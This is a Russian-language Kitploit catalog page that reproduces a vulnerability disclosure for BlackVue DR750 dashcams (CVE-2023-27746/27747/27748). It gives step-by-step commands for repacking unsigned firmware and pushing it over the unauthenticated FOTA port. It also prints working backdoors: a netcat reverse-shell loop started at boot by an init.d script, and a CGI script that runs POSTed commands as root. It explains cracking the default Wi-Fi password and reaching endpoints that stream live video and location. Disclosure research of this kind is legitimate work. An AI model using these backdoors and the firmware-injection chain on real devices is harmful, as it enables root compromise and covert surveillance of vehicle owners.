Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
blackvue-cve-2023 — BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748 | Kitploit
Инструменты/GitHubGitHub/eyjhb/blackvue-cve-2023
Безопасность встроенных системАудит Wi-FiБезопасность IoTАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеАнализ Прошивок
GitHubeyjhb/blackvue-cve-2023

blackvue-cve-2023

BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748

1022 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-уязвимости BlackVue DR750 (+ и другие)

Нижеследующее предназначено только для образовательных целей. Не пытайтесь делать это на устройстве, которым вы не владеете или на использование которого у вас нет разрешения.

На момент написания в сети насчитывается около ~300 уязвимых устройств BlackVue, которые можно легко обнаружить и взломать. Официального патча при этом нет.

Компания BlackVue была уведомлена об этих уязвимостях 30-07-2022 и ответила, что рассмотрит проблемы. Однако, насколько нам известно, с тех пор ничего не произошло.

Внедрение бэкдора в устройство (CVE-2023-27748)

Отсутствие проверки подлинности прошивки

Для прошивки отсутствует проверка подлинности, что позволяет злоумышленнику загрузить собственную прошивку. Такая прошивка может содержать бэкдоры или эксплойты.

Шаги для воспроизведения:

  1. Загрузите архив прошивки с сайта BlackVue
  2. Распакуйте .zip, содержащий файлы прошивки
  3. Распакуйте образ patch_<dashcam_name>.bin
  4. Измените или добавьте нужные файлы (см. Примеры бэкдоров)
  5. Снова упакуйте образ в tar.gz
  6. Вычислите контрольную сумму sue для нового patch_<dashcam_name>.bin (см. sue_checksum)
root@kitploit:~
# downloaded from https://blackvue.com/download/dr750-2ch-lte-firmware-multilanguage/
$ unzip dr750-2ch-lte-v1.012-eng.zip
$ cd BlackVue/System/upgrade
$ mkdir patch-out
$ tar -C patch-out -xvzf patch_DR750LTE.bin
# make changes in patch-out
$ tar -C patch-out -czvf patch_DR750LTE.bin .
$ python3 sue_checksum.py patch_DR750LTE.bin patch_DR750LTE.bin.sue
$ cd ../../../

Затем просто поместите папку BlackVue на SD-карту видеорегистратора, и он запустит прошивку из неё.

При создании прошивки для FOTA (Firmware Over The Air) вместо этого создайте файл .tgz из каталога System.

root@kitploit:~
$ tar -C BlackVue/System -czvf fwupgrade.tgz

Этот файл впоследствии можно использовать для загрузки собственной прошивки через FOTA и полной компрометации видеорегистратора.

Важно отметить: в ходе тестирования было замечено, что даже после обратной перепрошивки устройства официальной прошивкой с сайта BlackVue установленные бэкдоры сохранялись.

Неаутентифицированный протокол FOTA (Firmware Over The Air)

Видеорегистраторы BlackVue прослушивают порт 9771/TCP, на котором работает сервис FOTA (обновление прошивки «по воздуху»). С помощью этого сервиса можно выполнить ping, перезагрузку, получить время устройства, обновить прошивку и т.д.

Эта конечная точка ничем не защищена: к ней можно получить доступ, находясь в одной локальной сети (LAN) с видеорегистратором, или из интернета, если регистратор подключён к LTE, что является серьёзной угрозой безопасности. Python-скрипт, который может взаимодействовать с сервисом FOTA, можно найти здесь.

Создайте новую прошивку, следуя шагам из предыдущего раздела, и загрузите её с помощью Python-скрипта.

root@kitploit:~
python software/fota/fota.py 10.0.0.1 upgrade /tmp/fwupgrade.tgz

Эта утилита не гарантирует работоспособность, но однажды она уже сработала.

Отсутствие межсетевого экрана

Видеорегистраторы поставляются без включённого межсетевого экрана, что не является большой проблемой, если регистратор подключён только через Wi-Fi. Однако LTE-версия подключается к интернету напрямую, поскольку некоторые мобильные операторы не настраивают межсетевой экран и не размещают своих пользователей за NAT. Это можно проверить, изучив извлечённую прошивку.

Как минимум, видеорегистраторы BlackVue с LTE должны блокировать подключения со стороны LTE.

Небезопасный пароль Wi-Fi по умолчанию (CVE-2023-27746)

Пароль Wi-Fi по умолчанию для видеорегистратора состоит только из строчных буквенно-цифровых символов и имеет длину 8. Можно перехватить handshake (рукопожатие) видеорегистратора и использовать инструменты Aircrack-ng для вычисления пароля (если пользователь его не менял). Это можно сделать примерно за ~4 дня с помощью арендованного оборудования (~40 EUR).

Неаутентифицированный веб-сервер (CVE-2023-27747)

По умолчанию веб-сервер доступен без аутентификации и предоставляет различные конечные точки.

root@kitploit:~
├── blackvue_live.cgi
├── blackvue_livedata.cgi
├── blackvue_vod.cgi
├── Config
├── index.html
├── Record
└── upload.cgi

Эти конечные точки позволяют следующее:

  1. Прямая видеотрансляция с видеорегистратора
  2. Поток данных в реальном времени (местоположение, скорость и т.д.)
  3. Скачивание всех записей с видеорегистратора
  4. Загрузка собственной конфигурации на видеорегистратор
  5. Скачивание текущей конфигурации с видеорегистратора 5.1. Сюда входит потенциальная информация о Wi-Fi, которую можно расшифровать (см. выше)

Небезопасное хранение пароля Wi-Fi на SD-карте

SSID и пароль сети Wi-Fi, к которой будет подключаться видеорегистратор, хранятся на SD-карте в регистраторе. Эти данные зашифрованы, но ключ легко обнаруживается при реверс-инжиниринге приложения. Как продемонстрировано в wifi-decrypt.py.

Также стоит отметить, что при смене сети Wi-Fi, к которой должен подключаться видеорегистратор, эти значения отправляются на серверы BlackVue, которые хранят их до тех пор, пока не смогут передать информацию регистратору. Неизвестно, удаляются ли эти данные после того, как регистратор снова становится доступен.

Комбинирование этих атак

Всё это можно скомбинировать в простой RCE, особенно на видеорегистраторах с LTE.

  1. Создайте собственную прошивку с бэкдором
  2. Используйте fota.py для удалённой загрузки прошивки
  3. Подключитесь к бэкдору
  4. ???
  5. Профит

Примеры бэкдоров

Несколько примеров бэкдоров, которые можно включить в собственную прошивку.

Netcat

Следующий бэкдор подключится к удалённой машине и предоставит полный доступ к shell от имени root.

/bin/backdoor.sh

root@kitploit:~
#!/bin/sh
IP=$1
PORT=$2

while /bin/true; do
    /usr/bin/nc $IP $PORT -e /bin/sh
done

Следующий init.d-скрипт будет запускать бэкдор при каждой загрузке системы и подключаться к указанному IP/порту. /etc/init.d/S85backdoor

root@kitploit:~
#!/bin/sh
/bin/backdoor 10.99.77.20 1745 &

cmd.cgi

Следующий бэкдор позволит выполнять команды (от имени root) при отправке полезной нагрузки (payload) на веб-сервер.

/res/System/www/cmd.cgi

root@kitploit:~
#!/bin/sh

echo "Content-type: text/html"    # set the data-type we want to use
echo ""

POST_STRING=$(/bin/cat)
echo $POST_STRING
exec $POST_STRING
Скачать инструмент